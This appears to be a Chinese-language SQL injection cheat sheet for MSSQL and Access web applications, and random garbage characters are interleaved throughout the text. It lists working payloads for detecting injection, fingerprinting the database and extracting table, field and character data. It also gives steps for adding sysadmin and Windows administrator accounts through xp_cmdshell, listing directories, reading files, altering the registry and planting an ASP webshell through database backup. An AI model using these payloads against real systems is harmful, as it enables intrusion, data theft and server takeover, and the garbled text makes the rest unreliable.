1.判断是否有注入;and 1=1 ;and 1=2 o:3(J���}
2.初步判断是否是mssql ;and user>0 Jm�g�9|g!f
`VUJW]�wGu
3.注入参数是字符'and [查询条件] and ''=' 2 � @T~VRy
R2C~.d_TDu
4.搜索时没过滤参数的'and [查询条件] and '%25'=' {[Y7���h}7
jrz�.n�4Y`
5.判断数据库系统 'wMv�O{}$�
$��o\z�4_I
;and (select count(*) from sysobjects)>0 mssql y&O?`"Uv/M
G{>P�YLxOb
;and (select count(*) from msysobjects)>0 access I�EP|j;�~*
7gB�?rJHV,
^ACrWk~UY�
J-uQF|�� �
6.猜数据库 ;and (select Count(*) from [数据库名])>0 ��|s(Ih_Zn
l`�A�&LQ[�
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 ��0r�I/��$
��I�hZ�n�
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 /N<aN9Z<x,
�enQW;N1_M
9.(1)猜字段的ascii值(access) a8ou�k�7�G
�%l�a1�-r~
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 �c�?}�G;�$
Wwg<-
9wAJ
(2)猜字段的ascii值(mssql) cS�:O|R#%t
UpE���+WzY
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 }' Y)"8AIA
v'E�hr**]+
10.测试权限结构(mssql) e?B}^Dk�0i
C8T0=o/-`
p�8@��&(+z
FkuD Gg~a
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- >q��r/1�mW
[{GN#W|AGP
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- SDE$�ymP�x
GRkN0|ovfj
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- f_xv�X��f:
9Oq(�` 4�
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- |K{��d5\�_
c?.� i;4yh
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- �w%X@os}E�
U] GD��6q
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- �4�pQf*l8e
j|&D(�]�W/
;and 1=(select IS_MEMBER('db_owner'));-- ����zy"k b
Xy!NBh�7I
V.q�H&FJ=l
~I;x_0i�Y4
11.添加mssql和系统的帐户 -��Q
JP�J.
k0ai#3�iJ
;exec master.dbo.sp_addlogin username;-- =H;'.!77Hx
;exec master.dbo.sp_password null,username,password;-- *)
�T"-}�F
v�@�q�&B|0
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- .|hsn6i�/-
|3T2}oh�rr
;exec master.dbo.xp_cmdshell 'net user username password [+R_3'��aK
X;UEq]kcmn
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- ){�'<67�dK
/d:hW4}<}.
;exec master.dbo.xp_cmdshell 'net user username password /add';-- �Y_jc��*S�
oPni4^g i�
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- zaLPPm&f��
W��Sx�oGly
x�0i���pk}
+����L.D3
12.(1)遍历目录 8�]b;l; W5
\9`
~�9#P�
;create table dirs(paths varchar(100), id int) ?a��% F�3B
�cHT\sJo`l
;insert dirs exec master.dbo.xp_dirtree 'c:\' �y {B�ajil
��
+PA�Dy8
;and (select top 1 paths from dirs)>0 %�Y=r5'6l�
|?Edk��7`
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) "a~r'�+�'<
6k>5+��-&_
�^--�R#$X
�cb0rkmO��
(2)遍历目录 A�y 4P_>^�
")vtS}E�kt
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- /!?Tv8TP�p
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 ;|����?_C8
@{_X@Wv4iV
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 4�;AQ12<[1
O�< /b]<[�
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 k�Br�A ? �
F!u)8>s+z{
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 IO
0n��T
\a�M-m�:J
myN2�G?>;�
�"T^%H�Pif
13.mssql中的存储过程 �rCczQ�71W
,VEE<*��'X
xp_regenumvalues 注册表根键, 子键 ZX`�x�9/0&
.�xmB8�� R
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 N�'&>bO?@`
^9�L�oxU-�
xp_regread 根键,子键,键值名 oA~�0"}eS
AA�=rj�B9�
;exec xp_regread �4�[]�*�=
glU9A39qx?
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 E�#��8|�h(
'/ Hoq����
xp_regwrite 根键,子键, 值名, 值类型, 值 <�a
-a�~�
(��GL'�m[V
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 �SG\ /m'�F
G<<;�����a
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 Q�(y�g bT�
��wXqw�b|2
xp_regdeletevalue 根键,子键,值名 <X4f2z{T{@
$!9/s� �S?
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 MnF�|�'t��
�F02TM�#Zi
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 �O|=?�!|`o
@d|S�v1d%
uE��(5q!/�
��
+�@�f�
14.mssql的backup创建webshell _xi��&%F�/
G�BRi�U�&D
use model �/|U�bYe,�
oPa�oQbR(A
create table cmd(str image); vf<Dqy�<M.
rKslgZh��Q
insert into cmd(str) values (''); @j�Mo/kO/A
�>yT1oD0+x
backup database model to disk='c:\l.asp'; !A�%
v�R\
CVkJ�M�H_
�Z`G�EF|eh
bf2n%-�&9g
15.mssql内置函数 �~p
n�$'1Q
MoE�h2�5U.
;and (select @@version)>0 获得Windows的版本号 M.MQ?`_"�b
"�a��'I^B/
;and user_name()='dbo' 判断当前系统的连接用户是不是sa �N�: � 38N
$yj*��n;��
;and (select user_name())>0 爆当前系统的连接用户 2
V�\h�G?<
>!" Sr�3,L
;and (select db_name())>0 得到当前连接的数据库 Nv;'Y�s� P
�W1���xPK*
J>�#yA0QD2
�<zvtQ^{�]
16.简洁的webshell �_�4S�Z9yu
�# .(f7~
use model u�^E0��u^�
E��LM�z~vp
create table cmd(str image); �E)jd�>"�
Bd=K��40Z:
insert into cmd(str) values (''); h,BP�f5�\S
$t"QLs�k0
backup database model to disk='g:\wwwtest\l.asp';
